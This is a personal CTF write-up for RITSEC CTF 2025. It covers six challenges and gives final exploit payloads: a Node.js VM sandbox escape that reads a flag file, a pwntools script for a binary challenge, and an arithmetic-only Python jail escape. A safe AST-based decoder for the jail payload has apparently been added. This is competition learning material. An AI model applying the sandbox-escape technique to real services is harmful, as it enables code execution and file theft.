RITSEC CTF 2025

My Solves/Writeups

Web

| Challenge Name | Difficulty | Points | Writeup |
| --- | --- | --- | --- |
| web/virtual-mayhem | easy | 419 | jump |
| web/upload-issues | medium | 483 | jump |

Pwn

| Challenge Name | Difficulty | Points | Writeup |
| --- | --- | --- | --- |
| pwn/bit-burger | easy | 467 | jump |
| pwn/hashmatch | medium | 499 | jump |

Jail

| Challenge Name | Difficulty | Points | Writeup |
| --- | --- | --- | --- |
| jail/shrimple | easy | 494 | jump |
| jail/seti | easy | 496 | jump |

Writeups

web/virtual-mayhem

This application uses a virtual machine to sandbox user templates and filters potentially harmful input. However, every lock has its key. Can you figure out how to escape the virtual machine and retrieve the flag?

host5.metaproblems.com:7585

(This challenge was written by MetaCTF. The flag format is MetaCTF{})

Attachments: virtual_mayhem.zip

Solution

Final exploit:

({}).constructor.constructor("return glo"+"bal['pr'+'ocess']['main'+'Module']['req'+'uire']('f'+'s').readFileSync('flag.txt','utf8')")()

Flag: i forgor

web/upload-issues

This site lets you look at cpio archives. If only we had an admin account, we could look at the flag…

web-upload-issues.ctf.ritsec.club

(This challenge was written by ICR.)

Attachments: upload_issues.zip

Solution

Flag: RS{b34m_m3_up_5c0tty}

pwn/bit-burger

Welcome to BitBurger, home of the world-famous Bit Burger! 🍔

Put in an order here: nc binex-bitburger.ctf.ritsec.club 32200

Only grilled or fried at the moment though, the other machines are broken, sorry!

(This challenge was written by MetaCTF.)

Attachments: bit_burger.zip

Solution

The idea for this challenge was simple, being just

Final Exploit:

from pwn import *

s    = lambda   x : io.send(x)
sa   = lambda x,y : io.sendafter(x,y)
sl   = lambda   x : io.sendline(x)
sla  = lambda x,y : io.sendlineafter(x,y)
r    = lambda x   : io.recv(x)
ru   = lambda x   : io.recvuntil(x)
rl   = lambda     : io.recvline()
itr  = lambda     : io.interactive()
uu32 = lambda x   : u32(x.ljust(4,b'\x00'))
uu64 = lambda x   : u64(x.ljust(8,b'\x00'))
ls   = lambda x   : log.success(x)
lss  = lambda x   : ls('\033[1;31;40m%s -> 0x%x \033[0m' % (x, eval(x)))

def start(argv=[], *a, **kw):
    if args.GDB:  # Set GDBscript below
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:  # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else:  # Run locally
        return process([exe.path] + argv, *a, **kw)


def find_ip(payload):
    p = process([exe.path], level='warn')
    p.sendlineafter(b'>', payload)
    p.wait()
    ip_offset = cyclic_find(p.corefile.read(p.corefile.sp, 4))
    # cyclic_find() returns an int, so format it instead of concatenating to a str
    warn('located EIP/RIP offset at {}'.format(ip_offset))
    return ip_offset

gdbscript = '''
init-pwndbg
b *0x0000000000401601
continue
'''.format(**locals())

exe = ELF("./bit_burger.bin_patched")
elf = context.binary = exe
context.log_level = 'debug'

# Start Exploit

offset = 0

io = start()

bits_to_set_for_exec = [1,3,5,7,9,10,13,23]
#bits_to_set_for_exec = [2, 12, 15, 16, 18, 19, 20, 23, 24]
for i in range(1, 25):
    if i in bits_to_set_for_exec:
        sla(b'?', b'y')
    else:
        sla(b'?', b'n')

sla(b':', b'a')
itr()

Flag: pTCNp5p6LP0d7qA77yvb4SHf40

pwn/hashmatch

This server is asking me to reverse a hash for a flag, but brute forcing MD5 sounds tedious. Maybe there’s something more… fun we can do to find the flag.

nc hashmatch.ctf.ritsec.club 30898

When you connect, type your input and it will be handled by the challenge.

(This challenge was written by ICR.)

Attachments: hashmatch.zip

Solution

Note: Solved after the CTF ended.

Flag: nuclei

jail/shrimple

As shrimple as that :p

nc shrimple.ctf.ritsec.club 32195

Attachments: shrimple.py

Solution

After cleaning up many unneeded parentheses, I was eventually able to reach the 210 character limit.

Final exploit:

"((-~([]<[])<<-~-~-~-~([]<[]))--~-~([]<[])<<(-~(-~([]<[])<<-~-~-~-~([]<[]))--~-~([]<[])))-(-~-~-~-~([]<[]))**-~-~-~-~-~-~([]<[])+(-~-~([]<[])<<(-~-~-~-~-~-~([]<[])))+((-~([]<[]))<<-~-~-~-~-~([]<[]))--~-~([]<[])"

Then, after forming the image with CyberChef, throwing it into georgeom.net/StegOnline/ and browsing the bit planes showed the flag.

Flag: RS{n0t_s0_sHr1Mp13_any_m0r3_:3}
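The payload above is built only from `([]<[])` (which is False, i.e. 0), `-~x` (which is x + 1), shifts and arithmetic. The following is an added example, not part of the original writeup or the challenge code: an AST-based decoder that shows which integer such an expression encodes without passing it to eval(). The names `decode`, `MAX_LEN` and `MAX_BITS` and their limits are assumptions made for this sketch.

```python
import ast
import operator

# Payload copied verbatim from the writeup above.
PAYLOAD = "((-~([]<[])<<-~-~-~-~([]<[]))--~-~([]<[])<<(-~(-~([]<[])<<-~-~-~-~([]<[]))--~-~([]<[])))-(-~-~-~-~([]<[]))**-~-~-~-~-~-~([]<[])+(-~-~([]<[])<<(-~-~-~-~-~-~([]<[])))+((-~([]<[]))<<-~-~-~-~-~([]<[]))--~-~([]<[])"

BIN_OPS = {ast.Add: operator.add, ast.Sub: operator.sub,
           ast.LShift: operator.lshift, ast.Pow: operator.pow}
UNARY_OPS = {ast.USub: operator.neg, ast.Invert: operator.invert}
MAX_LEN = 512   # assumed input cap; keeps AST depth below the recursion limit
MAX_BITS = 64   # assumed result-size cap for << and **


def _is_false_atom(node):
    """True for the literal comparison ([] < []), which Python evaluates to False."""
    return (isinstance(node, ast.Compare) and len(node.ops) == 1
            and isinstance(node.ops[0], ast.Lt)
            and all(isinstance(n, ast.List) and not n.elts
                    for n in (node.left, node.comparators[0])))


def _eval(node):
    if _is_false_atom(node):
        return 0  # use int 0 rather than False so ~ and - act on a plain int
    if isinstance(node, ast.UnaryOp) and type(node.op) in UNARY_OPS:
        return UNARY_OPS[type(node.op)](_eval(node.operand))
    if isinstance(node, ast.BinOp) and type(node.op) in BIN_OPS:
        left, right = _eval(node.left), _eval(node.right)
        # Bound the result size before computing it, so a hostile input cannot exhaust memory.
        if isinstance(node.op, ast.LShift) and not (0 <= right and left.bit_length() + right <= MAX_BITS):
            raise ValueError("shift too large")
        if isinstance(node.op, ast.Pow) and not (0 <= right and left.bit_length() * right <= MAX_BITS):
            raise ValueError("power too large")
        return BIN_OPS[type(node.op)](left, right)
    # Names, calls, attributes, strings and every other node type are rejected.
    raise ValueError(f"disallowed syntax: {type(node).__name__}")


def decode(expr):
    """Return the integer a restricted-alphabet expression encodes, without eval()."""
    if len(expr) > MAX_LEN:
        raise ValueError("expression too long")
    return _eval(ast.parse(expr, mode="eval").body)


if __name__ == "__main__":
    print(len(PAYLOAD), decode(PAYLOAD))
```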

jail/seti

Come join our search for alien life

nc seti.ctf.ritsec.club 31793

Attachments: seti.zip

Solution

i forgor